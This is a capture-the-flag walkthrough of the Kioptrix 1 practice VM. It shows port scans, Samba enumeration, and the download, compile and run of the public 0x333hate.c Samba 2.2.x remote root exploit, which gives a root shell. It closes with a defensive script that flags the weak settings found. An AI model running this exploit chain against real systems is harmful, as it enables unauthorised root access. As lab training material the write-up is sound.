Kioptrix hacking challenge: Part 1
Kioptrix is another set of virtual machines that are intended to be hacked into. As of this writing there are currently four Kioptrix challenges. Each one increases in difficulty and is a good start for someone new to penetration testing. Towards the end of last April, I started playing around with it and documented the steps to exploit it. Kioptrix 1 is geared towards the beginner, and is one of the easiest challenges out there.
The Kioptrix virtual machines can be downloaded from http://www.kioptrix.com/blog/?page_id=135
I identified the IP address of the virtual machine using netdiscover and launched a port scan against it.
```
# nmap -sS -T4 -A 192.168.1.144

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-23 20:26 EDT
Nmap scan report for 192.168.1.144
Host is up (0.00048s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26 09:32:06
|_Not valid after: 2010-09-26 09:32:06
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_sslv2: server still supports SSLv2
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
1024/tcp open status (status V1) 1 (rpc #100024)
MAC Address: 00:0C:29:46:F7:8C (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms 192.168.1.144
```
nmap found a webserver, so I pointed my browser to http://192.168.1.144 and found an Apache test page. I fired up nikto and DirBuster in the background to scan the website for any vulnerabilities and hidden directories. In the meantime, I decided to look into the open Samba port. nmap didn’t print out the Samba version, so I decided to probe it a bit. I used nmblookup and smbclient:
```
# nmblookup -A 192.168.1.144
Looking up status of 192.168.1.144
    KIOPTRIX <00> - B <ACTIVE>
    KIOPTRIX <03> - B <ACTIVE>
    KIOPTRIX <20> - B <ACTIVE>
    ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
    MYGROUP <00> - <GROUP> B <ACTIVE>
    MYGROUP <1d> - B <ACTIVE>
    MYGROUP <1e> - <GROUP> B <ACTIVE>

    MAC Address = 00-00-00-00-00-00

# smbclient -L //KIOPTRIX -I 192.168.1.144
Enter root's password:
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

    Sharename Type Comment
    --------- ---- -------
cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error ERRnosupport
    IPC$ IPC IPC Service (Samba Server)
    ADMIN$ Disk IPC Service (Samba Server)
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

    Server Comment
    --------- -------
    KIOPTRIX Samba Server

    Workgroup Master
    --------- -------
    MYGROUP KIOPTRIX
```
I was able to get a listing of the shares without a password. Using smbclient I identified that the server was running Samba 2.2.1a. I headed over to Google and searched for Samba 2.2.1 exploits. This revealed a SANS paper about a Samba exploit called 0x333hate.c. A Google search for 0x333hate.c yielded a copy of the exploit, hosted at SecurityFocus.com.
I downloaded the file and compiled it.
```
# wget http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c
--2012-04-23 22:34:02-- http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c
Resolving downloads.securityfocus.com... 184.108.40.206
Connecting to downloads.securityfocus.com|220.127.116.11|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6514 (6.4K) [text/plain]
Saving to: `0x333hate.c'

100%[=================================================================================================================>] 6,514 --.-K/s in 0.1s

2012-04-23 22:34:03 (62.5 KB/s) - `0x333hate.c' saved [6514/6514]

# gcc 0x333hate.c
0x333hate.c: In function ‘usage’:
0x333hate.c:91: warning: incompatible implicit declaration of built-in function ‘exit’
0x333hate.c: In function ‘exploit’:
0x333hate.c:126: warning: incompatible implicit declaration of built-in function ‘exit’
0x333hate.c:130: warning: incompatible implicit declaration of built-in function ‘exit’
0x333hate.c:134: warning: incompatible implicit declaration of built-in function ‘exit’
0x333hate.c:139: warning: incompatible implicit declaration of built-in function ‘exit’
0x333hate.c:142: warning: incompatible implicit declaration of built-in function ‘exit’
0x333hate.c: In function ‘owned’:
0x333hate.c:201: warning: incompatible implicit declaration of built-in function ‘exit’
0x333hate.c:210: warning: incompatible implicit declaration of built-in function ‘exit’
0x333hate.c:220: warning: incompatible implicit declaration of built-in function ‘exit’
0x333hate.c: In function ‘main’:
0x333hate.c:252: warning: format ‘%x’ expects type ‘unsigned int’, but argument 3 has type ‘long unsigned int’
```
Some warning messages, but no errors. I ran the exploit to see what would happen:
```
# ./a.out

 [~] 0x333hate => samba 2.2.x remote root exploit [~]
 [~] coded by c0wboy ~ www.0x333.org [~]

 Usage : ./a.out [-t target] [-p port] [-h]

 -t target to attack
 -p samba port (default 139)
 -h display this help
```
Pretty simple: it takes only one argument, which is the IP address of the target. I tried it again and it gave me a root shell instantly:
```
# ./a.out -t 192.168.1.144

 [~] 0x333hate => samba 2.2.x remote root exploit [~]
 [~] coded by c0wboy ~ www.0x333.org [~]

 [-] connecting to 192.168.1.144:139
 [-] stating bruteforce

 [-] testing 0xbfffffff
 [-] testing 0xbffffdff
 [-] testing 0xbffffbff
 [-] testing 0xbffff9ff
 [-] testing 0xbffff7ff

Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
```
At this point the game was over. I explored the system a little bit and found a congratulatory message from the creator:
```
cat mbox
From root Sat Sep 26 11:42:10 2009
Return-Path: <[email protected]>
Received: (from [email protected])
    by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
    for [email protected]; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: About Level 2
Status: RO

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...
```
This challenge was basically just a scan and exploit against a vulnerable target. Although that seems easy, that’s exactly how a lot of servers are compromised. It’s not too difficult to find servers running certain vulnerable services and exploits that target them.
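Seen from the defender's side, the same scan output is an audit input. The following is an added example, not part of the original post: it parses nmap's normal output and the smbclient banner and flags the weak settings this walkthrough ran into. The rule list, the version threshold and the function names are assumptions made for illustration.

```python
import re

# Trimmed excerpts of the scan output shown in this post (sample input).
NMAP_SAMPLE = """\
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_sslv2: server still supports SSLv2
"""
SMB_SAMPLE = "Anonymous login successful\nDomain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]\n"

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
# Illustrative rules (assumption): NSE script-output substring -> finding text.
SCRIPT_RULES = [
    ("Server supports SSHv1", "SSH protocol 1 enabled"),
    ("still supports SSLv2", "SSLv2 enabled"),
    ("risky methods: TRACE", "HTTP TRACE enabled"),
]

def audit_nmap(text):
    """Return sorted (port, finding) pairs; NSE lines belong to the port line above them."""
    findings, port = set(), None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port = int(m.group(1))
        elif line.startswith("|") and port is not None:
            for needle, finding in SCRIPT_RULES:
                if needle in line:
                    findings.add((port, finding))
    return sorted(findings)

def audit_smb(text):
    """Flag anonymous share listing and a Samba 2.2.x (or older) version banner."""
    findings = []
    if "Anonymous login successful" in text:
        findings.append("anonymous share listing allowed")
    m = re.search(r"Server=\[Samba (\d+)\.(\d+)\.[^\]]*\]", text)
    # Threshold is an assumption taken from the exploit's own "samba 2.2.x" banner.
    if m and (int(m.group(1)), int(m.group(2))) <= (2, 2):
        findings.append("Samba %s.%s.x banner: upgrade required" % m.groups())
    return findings

if __name__ == "__main__":
    for port, finding in audit_nmap(NMAP_SAMPLE):
        print(f"{port}/tcp: {finding}")
    print("smb:", audit_smb(SMB_SAMPLE))
```

Run against your own hosts' scan results, every finding it reports is something an outside scanner sees too, including the exact service version in the banner.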